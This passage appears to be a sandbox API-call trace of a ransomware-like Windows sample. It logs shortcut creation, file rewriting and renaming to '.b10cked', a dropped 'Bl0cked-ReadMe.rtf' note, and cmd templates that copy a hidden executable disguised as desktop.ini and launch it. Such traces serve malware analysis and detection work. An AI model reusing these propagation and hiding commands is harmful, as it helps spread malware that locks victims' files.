This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0128.394] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0128.395] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"1VhPwYxy0yNVr kbAeh\" & type \"1VhPwYxy0yNVr kbAeh\\desktop.ini\" > \"%TEMP%\\dpMuznsG.exe\" && \"%TEMP%\\dpMuznsG.exe\"") returned 0x0 [0128.395] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0128.395] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0128.395] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0128.395] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh.lnk", fRemember=0) returned 0x0 [0128.404] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0128.404] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0128.404] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0128.404] CoUninitialize () [0128.404] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0128.405] ReleaseMutex (hMutex=0xf8) returned 1 [0128.405] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0128.405] ReleaseMutex (hMutex=0xf8) returned 1 [0128.405] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0128.405] ReleaseMutex (hMutex=0xf8) returned 1 [0128.405] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0128.405] ReleaseMutex (hMutex=0xf8) returned 1 [0128.405] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\Cf aWIIkKxWa7MD7fCc.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\cf awiikkxwa7md7fcc.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0128.405] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.405] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.405] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.405] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18519445630) returned 1 [0128.405] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.405] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.405] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.405] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xff49 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xff49 [0128.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0128.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xfa61 [0128.407] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0128.408] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0128.408] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0128.408] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xff49 [0128.408] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0128.408] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0128.408] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0128.408] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xff49 [0128.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0128.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0128.409] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7fa3, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7fa3, lpOverlapped=0x0) returned 1 [0128.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0128.409] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x7fa3, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x7fa3, lpOverlapped=0x0) returned 1 [0128.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=-32675, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7fa6 [0128.410] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7fa3, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7fa3, lpOverlapped=0x0) returned 1 [0128.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=-32675, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7fa6 [0128.410] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x7fa3, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x7fa3, lpOverlapped=0x0) returned 1 [0128.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cf aWIIkKxWa7MD7fCc.xlsx", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0128.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cf aWIIkKxWa7MD7fCc.xlsx", cchWideChar=24, lpMultiByteStr=0x132f7bc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Cf aWIIkKxWa7MD7fCc.xlsx", lpUsedDefaultChar=0x0) returned 24 [0128.421] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xff49 [0128.421] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0128.421] CloseHandle (hObject=0x114) returned 1 [0128.422] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\Cf aWIIkKxWa7MD7fCc.xlsx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS") returned 0x3f [0128.423] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0128.423] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x320, dwThreadId=0x7fc)) returned 1 [0128.425] CloseHandle (hObject=0x110) returned 1 [0128.425] CloseHandle (hObject=0x114) returned 1 [0128.425] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0128.425] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0128.425] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount2=88) returned 3 [0128.425] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0128.425] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0128.425] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0128.425] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0128.426] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0128.426] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0128.426] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0128.426] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0128.426] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0128.426] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x928, dwThreadId=0x924)) returned 1 [0128.442] CloseHandle (hObject=0x110) returned 1 [0128.442] CloseHandle (hObject=0x114) returned 1 [0128.442] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\bl0cked-readme.rtf")) returned 0xffffffff [0128.442] GetLastError () returned 0x2 [0128.442] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0128.445] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\bl0cked-readme.rtf")) returned 0x20 [0128.445] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0128.445] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0128.446] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0128.446] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0128.446] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0128.446] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0128.446] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0128.446] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0128.447] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0128.447] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0128.447] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1") returned 0x32 [0128.447] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x186 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\WXMD5U~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\WXMD5U~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\WXMD5U~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\WXMD5U~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x186 [0128.447] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0128.447] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h 